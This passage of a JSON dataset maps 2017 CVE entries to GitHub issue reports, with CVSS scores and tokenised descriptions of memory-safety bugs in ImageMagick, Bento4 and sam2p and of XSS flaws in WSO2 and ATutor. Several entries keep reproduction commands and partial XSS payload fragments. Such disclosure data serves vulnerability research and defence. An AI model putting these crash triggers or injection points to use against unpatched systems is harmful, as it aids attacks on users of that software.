        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-14628",
        "Issue_Url_old": "https://github.com/pts/sam2p/issues/14",
        "Issue_Url_new": "https://github.com/pts/sam2p/issues/14",
        "Repo_new": "pts/sam2p",
        "Issue_Created_At": "2017-09-18T13:28:39Z",
        "description": "6 bugs found in sam2p. bug NUMBERTAG integer overflow(lead to heap buffer overflow) poc: URLTAG asan: URLTAG method: ./sam2p crash EPS: /dev/null reason: URLTAG after the subduction, w will be a negative number. URLTAG so pad will become larger when the program use it to sub w. URLTAG and when using pad, it will access the invalid memory before the allocated chunk. patch: change w from signed to unsigned. bug NUMBERTAG heap buffer overflow poc: URLTAG asan: URLTAG method: ./sam2p crash EPS: /dev/null reason: URLTAG The crash happened in the APITAG function of the file APITAG The size of the Pic NUMBERTAG is w h planes. But the loop time is nbytes=bperlin h planes, in the loop, pix will add one each time. It will cause a heap overflow when bperlin>w. In this poc, bperlin NUMBERTAG w NUMBERTAG patch: Compare the size of w and bperlin bug NUMBERTAG integer overflow poc: URLTAG asan: URLTAG method: ./sam2p crash EPS: /dev/null reason: It crashed in function in_xpm_reader. The type of p is char When p NUMBERTAG a0\uff0cp NUMBERTAG p NUMBERTAG will be recognized as a negative integer, it will make bin NUMBERTAG ffffffffffffa NUMBERTAG I, which caused a crash. patch: change p from signed to unsigned char . bug NUMBERTAG integer overflow poc: URLTAG asan: URLTAG method: ./sam2p crash EPS: /dev/null reason: URLTAG In this poc, when APITAG returned NUMBERTAG to ncols, ncols made it to NUMBERTAG ffffffff, and caused a integer overflow. So the loop will excute NUMBERTAG ffffffff times, which caused the crash. patch: Define Ncols as an int, or you can judge if ncols is NULL. bug NUMBERTAG out of bounds access poc: URLTAG asan: URLTAG method: ./sam2p crash EPS: /dev/null reason: URLTAG In APITAG function APITAG NUMBERTAG but the size of APITAG is NUMBERTAG If APITAG NUMBERTAG it will crash. patch: modified APITAG or expand the APITAG bug NUMBERTAG integer overflow poc: URLTAG asan: URLTAG method: ./sam2p crash EPS: /dev/null reason: URLTAG In APITAG function APITAG W h planes will cause integer overflow. patch: check W h planes' value before malloc.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-14634",
        "Issue_Url_old": "https://github.com/erikd/libsndfile/issues/318",
        "Issue_Url_new": "https://github.com/libsndfile/libsndfile/issues/318",
        "Repo_new": "libsndfile/libsndfile",
        "Issue_Created_At": "2017-09-14T09:30:55Z",
        "description": "a div zero vul in function APITAG in libsndfile NUMBERTAG ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-14638",
        "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/182",
        "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/182",
        "Repo_new": "axiomatic-systems/bento4",
        "Issue_Created_At": "2017-09-08T13:23:17Z",
        "description": "NULL pointer dereference in APITAG APITAG On NUMBERTAG ERRORTAG Testcase: URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-14639",
        "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/190",
        "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/190",
        "Repo_new": "axiomatic-systems/bento4",
        "Issue_Created_At": "2017-09-08T13:41:59Z",
        "description": "stack based buffer underflow in APITAG APITAG On NUMBERTAG ERRORTAG Testcase: URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-14640",
        "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/183",
        "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/183",
        "Repo_new": "axiomatic-systems/bento4",
        "Issue_Created_At": "2017-09-08T13:25:38Z",
        "description": "NULL pointer dereference in APITAG APITAG On NUMBERTAG ERRORTAG Testcase: URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-14641",
        "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/184",
        "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/184",
        "Repo_new": "axiomatic-systems/bento4",
        "Issue_Created_At": "2017-09-08T13:28:21Z",
        "description": "NULL pointer dereference in APITAG APITAG On NUMBERTAG ERRORTAG Testcase: URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-14642",
        "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/185",
        "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/185",
        "Repo_new": "axiomatic-systems/bento4",
        "Issue_Created_At": "2017-09-08T13:31:49Z",
        "description": "NULL pointer dereference in APITAG APITAG On NUMBERTAG ERRORTAG Testcase: URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-14643",
        "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/187",
        "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/187",
        "Repo_new": "axiomatic-systems/bento4",
        "Issue_Created_At": "2017-09-08T13:35:49Z",
        "description": "heap based buffer overflow in APITAG APITAG On NUMBERTAG ERRORTAG Testcase: URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-14646",
        "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/188",
        "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/188",
        "Repo_new": "axiomatic-systems/bento4",
        "Issue_Created_At": "2017-09-08T13:37:40Z",
        "description": "heap based buffer overflow in APITAG APITAG On NUMBERTAG ERRORTAG Testcase: URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-14651",
        "Issue_Url_old": "https://github.com/cybersecurityworks/Disclosed/issues/15",
        "Issue_Url_new": "https://github.com/cybersecurityworks/disclosed/issues/15",
        "Repo_new": "cybersecurityworks/disclosed",
        "Issue_Created_At": "2017-09-18T13:24:31Z",
        "description": "Multiple Cross Site Scripting (XSS) in WSO2 Data Analytics Server Version NUMBERTAG Details: WSO2 Product Bug Report Bug Name: Multiple Cross Site Scripting (XSS) Product Name: WSO2 Server: WSO2 Data Analytics Server Product. Version NUMBERTAG Last Updated NUMBERTAG Homepage: URLTAG Severity: Medium Status: Fixed Exploitation Requires Authentication?: yes Vulnerable URL: FILETAG Vulnerable Variable: APITAG & APITAG APITAG Description: Cross Site Scripting (XSS) vulnerability in WSO2 Data Analytics Server Product. By exploiting a Cross site scripting vulnerability the attacker can hijack a logged in user\u2019s session by stealing cookies which means that the malicious hacker can change the logged in user\u2019s password and invalidate the session of the victim while the hacker maintains access. Proof of concept: (POC) APITAG NUMBERTAG APITAG Accessing the POST Request of the URL, FILETAG with XSS payloads through vulnerable variable APITAG APITAG and APITAG APITAG will execute XSS in victim\u2019s browser. FILETAG APITAG NUMBERTAG APITAG POST request URL, FILETAG with XSS payloads through vulnerable variable APITAG APITAG FILETAG APITAG NUMBERTAG APITAG Reflected response for the vulnerable variable APITAG APITAG with XSS Payload is executed. FILETAG APITAG NUMBERTAG APITAG POST request URL, FILETAG with XSS payloads through vulnerable variable APITAG APITAG (also collection name has to be injected with any invalid symbols) FILETAG APITAG NUMBERTAG APITAG Reflected response for the vulnerable variable APITAG APITAG with XSS Payload is executed. APITAG NUMBERTAG APITAG Accessing the GET Request of the URL URLTAG \"> APITAG alert NUMBERTAG APITAG &random NUMBERTAG will execute XSS in victim\u2019s browser. FILETAG APITAG NUMBERTAG APITAG GET request URL, URLTAG \"> APITAG alert NUMBERTAG APITAG &random NUMBERTAG with XSS payload through path variable is vulnerable to Cross Site Scripting. FILETAG APITAG NUMBERTAG APITAG Accessing GET request is executing XSS payload through the vulnerable variable. APITAG Steps APITAG NUMBERTAG Logon into carbon application with given credentials (admin/admin in localhost NUMBERTAG Now, access the vulnerable GET & POST Request URL with payload inserted into the vulnerable variable NUMBERTAG SS will get executed in the user machine once the user clicks on the given vulnerable link with XSS Payloads for both GET & POST request. APITAG APITAG NUMBERTAG Discovered in WSO2 Data Analytics Server Product version NUMBERTAG Reported to EMAILTAG NUMBERTAG Got instant response from WSO2 security team acknowledging the Vulnerability NUMBERTAG Got mail confirming that NUMBERTAG st issue was the new one NUMBERTAG nd issue have been reported earlier & fixed NUMBERTAG Public patching was on progress NUMBERTAG Patched and also, gave credits on their pages NUMBERTAG URLTAG NUMBERTAG URLTAG NUMBERTAG Got Token of Appreciation along with a hard copy of an appreciation certificate. APITAG by: APITAG Sathish from APITAG Cyber Security Works Pvt Ltd APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2017-14684",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/770",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/770",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-09-21T09:06:39Z",
        "description": "memory leak in APITAG APITAG version: Version: APITAG NUMBERTAG Q NUMBERTAG gcc NUMBERTAG crash link : FILETAG trigger command : ./magick convert APITAG /dev/null detail : APITAG APITAG PATHTAG ./magick convert APITAG /dev/null APITAG NUMBERTAG ERROR: APITAG detected memory leaks Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG d3ead NUMBERTAG in __interceptor_realloc ( PATHTAG NUMBERTAG f NUMBERTAG c7c7feb in APITAG APITAG NUMBERTAG f NUMBERTAG c7c NUMBERTAG f in APITAG APITAG NUMBERTAG f NUMBERTAG c8fe6bf in APITAG APITAG NUMBERTAG f NUMBERTAG cc NUMBERTAG c6 in APITAG APITAG NUMBERTAG f NUMBERTAG c5f NUMBERTAG dd in APITAG APITAG NUMBERTAG f NUMBERTAG c5f NUMBERTAG c4 in APITAG APITAG NUMBERTAG f NUMBERTAG bdae8be in APITAG APITAG NUMBERTAG f NUMBERTAG bf NUMBERTAG in APITAG APITAG NUMBERTAG a NUMBERTAG in APITAG APITAG NUMBERTAG c8e in main APITAG NUMBERTAG f NUMBERTAG b NUMBERTAG f in __libc_start_main ( PATHTAG ) SUMMARY: APITAG NUMBERTAG byte(s) leaked in NUMBERTAG allocation(s). APITAG APITAG APITAG Security Lab",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-14731",
        "Issue_Url_old": "https://github.com/libofx/libofx/issues/10",
        "Issue_Url_new": "https://github.com/libofx/libofx/issues/10",
        "Repo_new": "libofx/libofx",
        "Issue_Created_At": "2017-09-25T16:21:00Z",
        "description": "ofxdump heap buffer overflow PATHTAG APITAG const ). Hello, I found following heap based buffer overflow from ofxdump. Is this a valid finding and could you fix it, thanks? I am more than happy to continue fuzzing libofx to improve the librarys quality. You can create the reproducer with: ERRORTAG And run it with ofxdump: ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-14735",
        "Issue_Url_old": "https://github.com/nahsra/antisamy/issues/10",
        "Issue_Url_new": "https://github.com/nahsra/antisamy/issues/10",
        "Repo_new": "nahsra/antisamy",
        "Issue_Created_At": "2017-07-05T22:14:50Z",
        "description": "Support HTML5. APITAG uses a deprecated FILETAG which does not understand newer HTML5 tags like APITAG URLTAG . While this is a minor issue, it also does not understand newer HTML5 entities like \"&colon;\" or \"&lpar;\". This leads to a security vulnerability where the following text does not get cleaned: APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-14737",
        "Issue_Url_old": "https://github.com/randombit/botan/issues/1222",
        "Issue_Url_new": "https://github.com/randombit/botan/issues/1222",
        "Repo_new": "randombit/botan",
        "Issue_Created_At": "2017-09-25T16:11:07Z",
        "description": "Investigate RSA side channel from Usenix Security. Looking through papers from this years Usenix Security I come across an interesting one on identifying cache based timing channels. URLTAG Hm I wonder what bugs they found... from the abstract APITAG we have successfully discovered previously unknown issues in two widely used cryptosystems, APITAG and Botan.\" well then! They analyze NUMBERTAG but the paper mentions \"we notice that this vulnerability affects several other versions of Botan, including NUMBERTAG and NUMBERTAG and so presumably NUMBERTAG also). Haven't read the paper carefully enough to understand the issue yet but hopefully this can be addressed in time for NUMBERTAG FTR I never received any contact about this ... shrug",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-14739",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/780",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/780",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-09-25T08:25:56Z",
        "description": "Null Pointer Dereference at APITAG of APITAG Hi all, Another potential NPD at APITAG in APITAG , and there is no null check after this acquiring. It could lead to denial of service when out of memory occurs. This seems a similar case of URLTAG ERRORTAG Regards, Alex, APITAG Inc.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-14741",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/771",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/771",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-09-21T09:07:05Z",
        "description": "endless loop in APITAG Version: APITAG NUMBERTAG I add a crafted font in PATHTAG APITAG and then run magick background lightblue fill blue font test size NUMBERTAG caption:'hello world' FILETAG magick will always occupy NUMBERTAG CPU. After I took a look, it maybe enter a endless loop in APITAG you can get the font from FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-14749",
        "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/2008",
        "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/2008",
        "Repo_new": "jerryscript-project/jerryscript",
        "Issue_Created_At": "2017-09-07T07:48:07Z",
        "description": "Security: NULL word of APITAG lead to heap memory corruption results in OOB write.. APITAG and Crash in release NUMBERTAG FILETAG is as follows(hex displayed): APITAG Among the first string, there is a ' NUMBERTAG a). This byte could be replaced by ' NUMBERTAG d) or other bytes. And this kind of bytes makes the generated byte code contains an NULL word NUMBERTAG which lead to a crash as the following stack trace shows: ERRORTAG Root cause When processing the strings, the generated byte code are as follows: CODETAG The NULL word in NUMBERTAG is one of the APITAG compressed pointer. When bytecode is executed, the reference of the literal add NUMBERTAG while APITAG was overwritten because of the compressed pointer. Twice as it was referenced so the field was added up to NUMBERTAG This makes the index of the free chunk lists corrupts. Potential Risks With the heap memory corruption the free chunk lists could be faked. Potentially there exists an local write primitive in memory. If jerry is embedded in some host and could execute js, this vulnerability could result in remote code execution. Fix Suggestion Check code in bytecode generation: the failed literal's compressed pointer should not be NULL word.",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-14868",
        "Issue_Url_old": "https://github.com/restlet/restlet-framework-java/issues/1286",
        "Issue_Url_new": "https://github.com/restlet/restlet-framework-java/issues/1286",
        "Repo_new": "restlet/restlet-framework-java",
        "Issue_Created_At": "2017-09-27T14:33:06Z",
        "description": "XXE security issue using the XML provider. As reported by one of our users: ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-14957",
        "Issue_Url_old": "https://github.com/BlogoText/blogotext/issues/318",
        "Issue_Url_new": "https://github.com/blogotext/blogotext/issues/318",
        "Repo_new": "blogotext/blogotext",
        "Issue_Created_At": "2017-09-14T18:21:30Z",
        "description": "Contact for security issue. Hi, I've found a serious security issue in APITAG NUMBERTAG MENTIONTAG How can I contact (email) you privately?",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-14981",
        "Issue_Url_old": "https://github.com/atutor/ATutor/issues/135",
        "Issue_Url_new": "https://github.com/atutor/atutor/issues/135",
        "Repo_new": "atutor/atutor",
        "Issue_Created_At": "2017-09-30T09:01:50Z",
        "description": "APITAG Cross Site Scripting (XSS) . Product: APITAG Download: URLTAG Vunlerable Version NUMBERTAG and probably prior Tested Version NUMBERTAG Author: APITAG of Venustech Advisory Details: Cross Site Scripting (XSS) were discovered APITAG NUMBERTAG which can be exploited to execute arbitrary JS code. The parameter \"url\" in the file PATHTAG is unsafe, we can bypass the XSS filter.An attacker could execute arbitrary JS code in a browser in the context of the vulnerable website. The exploitation examples below use the APITAG APITAG function to see a pop up messagebox: the poc is : url= APITAG . APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2017-14988",
        "Issue_Url_old": "https://github.com/openexr/openexr/issues/248",
        "Issue_Url_new": "https://github.com/academysoftwarefoundation/openexr/issues/248",
        "Repo_new": "academysoftwarefoundation/openexr",
        "Issue_Created_At": "2017-09-27T02:45:31Z",
        "description": "DOS bug while reading attributes in Header::readfrom. I use APITAG to convert exr image, and it report allocate memory failure. After took a look, APITAG calls APITAG to open exr file, this function only takes filename as argument, so I think it is a openexr bug. You can get the POC file from FILETAG and run : magick test.exr FILETAG ERRORTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-14989",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/781",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/781",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-09-25T10:57:05Z",
        "description": "heap use after free in APITAG Version : APITAG NUMBERTAG Q NUMBERTAG FILETAG In order to reproduce this bug, need to build APITAG and Freetype2 with ASAN. Add a crafted font in PATHTAG ''' APITAG ''' The crafted font file : FILETAG After have added the crafted font, run : magick background lightblue fill blue font test size NUMBERTAG caption:hello world FILETAG ASAN would report NUMBERTAG ERROR: APITAG heap use after free on address NUMBERTAG a0 at pc NUMBERTAG f NUMBERTAG ab1cc NUMBERTAG bp NUMBERTAG ffd NUMBERTAG c NUMBERTAG sp NUMBERTAG ffd NUMBERTAG c NUMBERTAG READ of size NUMBERTAG at NUMBERTAG a0 thread T NUMBERTAG f NUMBERTAG ab1cc NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG ac NUMBERTAG d4c in APITAG PATHTAG NUMBERTAG f NUMBERTAG ac NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG ac NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG ac NUMBERTAG aa NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG ac NUMBERTAG ea NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG ac5c NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG ac5cad NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG abf NUMBERTAG ad9 in APITAG PATHTAG NUMBERTAG f NUMBERTAG abf8a1fc in APITAG PATHTAG NUMBERTAG f NUMBERTAG abe NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG abe NUMBERTAG e0 in APITAG PATHTAG NUMBERTAG f NUMBERTAG abeb7ad7 in APITAG PATHTAG NUMBERTAG ee NUMBERTAG d in APITAG PATHTAG NUMBERTAG ee NUMBERTAG d in main PATHTAG NUMBERTAG f NUMBERTAG a NUMBERTAG f NUMBERTAG f in __libc_start_main PATHTAG NUMBERTAG a2d8 in _start ( PATHTAG NUMBERTAG a0 is located NUMBERTAG bytes inside of NUMBERTAG byte region APITAG freed by thread T0 here NUMBERTAG c0c8b in __interceptor_free PATHTAG NUMBERTAG f NUMBERTAG ac NUMBERTAG ad0 in APITAG PATHTAG NUMBERTAG f NUMBERTAG ac NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG ac NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG ac NUMBERTAG aa NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG ac NUMBERTAG ea NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG ac5c NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG ac5cad NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG abf NUMBERTAG ad9 in APITAG PATHTAG NUMBERTAG f NUMBERTAG abf8a1fc in APITAG PATHTAG NUMBERTAG f NUMBERTAG abe NUMBERTAG in APITAG PATHTAG previously allocated by thread T0 here NUMBERTAG c0fdc in __interceptor_malloc PATHTAG NUMBERTAG f NUMBERTAG ab NUMBERTAG e2 in ft_mem_qalloc PATHTAG NUMBERTAG f NUMBERTAG ab NUMBERTAG e2 in ft_mem_alloc PATHTAG NUMBERTAG f NUMBERTAG ac NUMBERTAG f NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG ac NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG ac NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG ac NUMBERTAG aa NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG ac NUMBERTAG ea NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG ac5c NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG ac5cad NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG abf NUMBERTAG ad9 in APITAG PATHTAG NUMBERTAG f NUMBERTAG abf8a1fc in APITAG PATHTAG NUMBERTAG f NUMBERTAG abe NUMBERTAG in APITAG PATHTAG ''' After I took a look at the code, I think it maybe caused by calling APITAG multiple times. First when ''' APITAG if (last_glyph.id NUMBERTAG APITAG last_glyph=glyph; APITAG } ''' last_glyph is equal to glyph. And then, in some cases, it will call APITAG and APITAG both. Since last_glyph = glyph, the last call will trigger this bug. ''' if (last_glyph.id NUMBERTAG APITAG / Determine font metrics. / APITAG APITAG APITAG if (ft_status NUMBERTAG APITAG } '''",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-14992",
        "Issue_Url_old": "https://github.com/moby/moby/issues/35075",
        "Issue_Url_new": "https://github.com/moby/moby/issues/35075",
        "Repo_new": "moby/moby",
        "Issue_Created_At": "2017-10-03T21:29:36Z",
        "description": "tar split does not read block by block nor validate tar format. Problem URLTAG This line can read any number of APITAG s at the end of an archive, potentially taking up all the space in RAM. Reproductible To reproduce, compress a high amount of NUMBERTAG s and push&pull as an image. Solution We should validate the integrity of tar headers and read block by block instead. Additional Comment MENTIONTAG also mentioned that URLTAG might be an issue if one can construct a very big tar header for a single entry. TBD /cc MENTIONTAG MENTIONTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-15010",
        "Issue_Url_old": "https://github.com/salesforce/tough-cookie/issues/92",
        "Issue_Url_new": "https://github.com/salesforce/tough-cookie/issues/92",
        "Repo_new": "salesforce/tough-cookie",
        "Issue_Created_At": "2017-09-05T12:43:35Z",
        "description": "Vulnerable Regular Expression. The following regular expression used for parsing the cookie is vulnerable to APITAG APITAG The slowdown is moderately low: for NUMBERTAG characters around NUMBERTAG seconds matching time. However, I would still suggest one of the following: remove the regex, anchor the regex, limit the number of characters that can be matched by the repetition, limit the input size. I noticed there is another bug report regarding the correctness of this regular expression. If needed, I can provide an actual example showing the slowdown.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-15015",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/724",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/724",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-09-03T15:05:49Z",
        "description": "Null Pointer Dereference in APITAG APITAG NUMBERTAG Q NUMBERTAG Here is the critical code: CODETAG APITAG may return NULL, so ( messages)[length+offset] will Dereference Null pointer to cause memory error. Credit: APITAG of Venustech",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-15016",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/725",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/725",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-09-03T15:06:02Z",
        "description": "Null Pointer Dereference in APITAG APITAG NUMBERTAG Q NUMBERTAG Here is the critical code: CODETAG APITAG may return NULL, so ((PAPMHEADER) APITAG APITAG will Dereference Null pointer to cause memory error. Credit: APITAG of Venustech",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-15017",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/723",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/723",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-09-03T15:05:37Z",
        "description": "Null Pointer Dereference in APITAG APITAG NUMBERTAG Q NUMBERTAG Here is the critical code: CODETAG APITAG may return NULL, so mng_info >global_plte[i].xxx will Dereference Null pointer to cause memory error. Credit: APITAG of Venustech",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
